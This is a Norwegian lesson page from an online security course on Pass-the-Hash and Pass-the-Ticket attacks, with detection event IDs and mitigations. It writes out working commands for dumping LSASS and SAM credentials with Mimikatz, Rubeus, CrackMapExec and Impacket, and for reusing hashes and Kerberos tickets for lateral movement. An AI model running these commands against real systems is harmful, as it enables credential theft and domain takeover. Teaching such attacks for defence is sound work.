Cyber Security Academy · leksjon

Pass-the-Hash- og Pass-the-Ticket-angrep

Bruk legitimasjonshasher og Kerberos-billetter til lateral forflytning uten å kjenne passordene i klartekst.

Leksjon 2 av 413 trinn

Pass-the-Hash- og Pass-the-Ticket-angrep er en gratis leksjon i Cyber Security Academy på CoddyKit. Dette er leksjon 2 av 4. Du kan lese valgfritt 3 leksjoner fra denne læringsstien gratis i sin helhet – deretter låser CoddyKit PRO opp alle leksjoner, samt praktisk øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Den er en del av læringsløpet i Cyber Security Academy, og fremdriften din synkroniseres mellom nettet og CoddyKit-appen. Kurset i Cyber Security Academy inneholder totalt 4 leksjoner.

Hvorfor disse angrepene finnes

Windows-protokoller for legitimasjon lagrer autentiseringshemmeligheter (NTLM-hasher og Kerberos-billetter) i minnet. En angriper med SYSTEM-rettigheter kan hente ut disse hemmelighetene og bruke dem på nytt til å autentisere som andre brukere uten å kjenne passordene.

Uttrekking av NTLM-hasher med Mimikatz

Mimikatz er det fremste verktøyet for uttrekking av legitimasjon på Windows. Når det kjøres som SYSTEM/Administrator, leser det minnet til LSASS-prosessen for å hente ut NTLM-hasher og legitimasjon i klartekst.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) med Mimikatz

PtH setter inn en NTLM-hash i en ny økt uten at klartekstpassordet er kjent. Hashen autentiserer mot fjerntjenester ved hjelp av NTLM – effektivt for lateral forflytning til andre Windows-verter.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash med Impacket

Impacket tilbyr Python-verktøy for PtH: psexec.py, smbexec.py og wmiexec.py godtar NTLM-hasher direkte for fjernkjøring av kommandoer.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Uttrekking av Kerberos-billetter

Kerberos-billetter lagres også i LSASS-minnet. Mimikatz henter dem ut, mens Rubeus er det spesialiserte verktøyet for Kerberos-billettoperasjoner på Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT setter inn en stjålet Kerberos-billett i den gjeldende økten. Billetten autentiserer mot tjenester som billettens opprinnelige eier – ingen hash eller passord er nødvendig.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Fjerndumping av LSASS

Fra et fotfeste kan LSASS dumpes eksternt ved hjelp av CrackMapExec eller Impackets secretsdump – det er ikke nødvendig med en interaktiv økt på målet.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Baner for lateral forflytning

Etter at hasher eller billetter er hentet ut, kan man bevege seg lateralt: bruk PtH mot andre maskiner med gjenbrukte lokale administratorrettigheter, bruk PtT for å få tilgang til domenetjenester, og eskaler mot domeneadministrator ved å målrette privilegerte kontoer.

Oppdaging av PtH og PtT

Forsvarere oppdager PtH ved hjelp av Event ID 4624 (pålogging) med påloggingstype 3 uten en tilsvarende interaktiv pålogging, avvik i NTLM-autentisering og Mimikatz-signaturer i minnet eller på disken.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Tiltak

Viktige tiltak er å aktivere Credential Guard (beskytter LSASS ved hjelp av virtualisering), begrense gjenbruk av lokale administratorrettigheter på tvers av maskiner (LAPS), håndheve gruppen Protected Users for privilegerte kontoer og deaktivere NTLM der det er mulig.

Overpass-the-Hash

Overpass-the-Hash konverterer en NTLM-hash til en Kerberos-TGT. Dette er nyttig i miljøer der NTLM er blokkert, men Kerberos er tilgjengelig, eller når det er behov for en TGT til videre Kerberos-angrep.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Hurtigsjekk

Hvilken sikkerhetsfunksjon i Windows beskytter lagringen av legitimasjon i LSASS ved hjelp av virtualisering?

Oppsummering: PtH og PtT

Pass-the-Hash og Pass-the-Ticket er grunnlaget for lateral forflytning i Active Directory. Begge utnytter Windows-bufring av legitimasjon i LSASS. Mimikatz og Impacket gjør uttrekking og gjenbruk enkelt. Beskytt miljøet med Credential Guard, LAPS, gruppen Protected Users og streng overvåking av autentiseringshendelser for NTLM og Kerberos.

Gratis å komme i gang

Lær deg Cyber Security Academy med en AI-veileder – gratis

Skriv og kjør ekte kode i nettleseren, få umiddelbar hjelp fra en AI-veileder som er tilgjengelig døgnet rundt, og fortsett der du slapp – på nettet eller i appen.

Kurs
76
Leksjoner
303

Ofte stilte spørsmål

Er leksjonen «Pass-the-Hash- og Pass-the-Ticket-angrep» gratis?

Ja – du kan lese valgfritt 3 av leksjonene i læringsstien Cyber Security Academy, inkludert «Pass-the-Hash- og Pass-the-Ticket-angrep», gratis i sin helhet her på nettet. Deretter låser CoddyKit PRO opp alle leksjoner, samt interaktiv øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Kurset i Cyber Security Academy inneholder totalt 4 leksjoner.

Hva lærer jeg i «Pass-the-Hash- og Pass-the-Ticket-angrep»?

Bruk legitimasjonshasher og Kerberos-billetter til lateral forflytning uten å kjenne passordene i klartekst. Du øver på Cyber Security Academy med praktisk kode som du kjører direkte i nettleseren, mens en AI-veileder som er tilgjengelig døgnet rundt, svarer på spørsmålene dine mens du jobber deg gjennom leksjonen.

Trenger jeg erfaring for å begynne med Cyber Security Academy?

Ingen tidligere erfaring er nødvendig. Cyber Security Academy på CoddyKit er lagt opp for både nybegynnere og viderekomne, så De kan begynne her eller helt fra start og lære i Deres eget tempo. Dette er leksjon 2 av 4.

Hvor lang tid tar leksjonen «Pass-the-Hash- og Pass-the-Ticket-angrep»?

De fleste CoddyKit-leksjoner tar omtrent 5–10 minutter. Hver leksjon er kort og interaktiv, slik at De gjør jevne fremskritt og kan fortsette akkurat der De slapp – både på nettet og i appen.

Kan jeg skrive og kjøre kode i denne Cyber Security Academy-leksjonen?

Ja. Alle Cyber Security Academy-leksjoner har en innebygd kodeeditor, slik at De kan skrive og kjøre ekte kode direkte i nettleseren og få umiddelbar tilbakemelding fra AI – uten lokal konfigurering.

Alle leksjonene i dette kurset

  1. Windows-autentisering: NTLM og Kerberos
  2. Pass-the-Hash- og Pass-the-Ticket-angrep
  3. Kerberoasting og AS-REP-roasting
  4. Herding av Active Directory
← Tilbake til Cyber Security Academy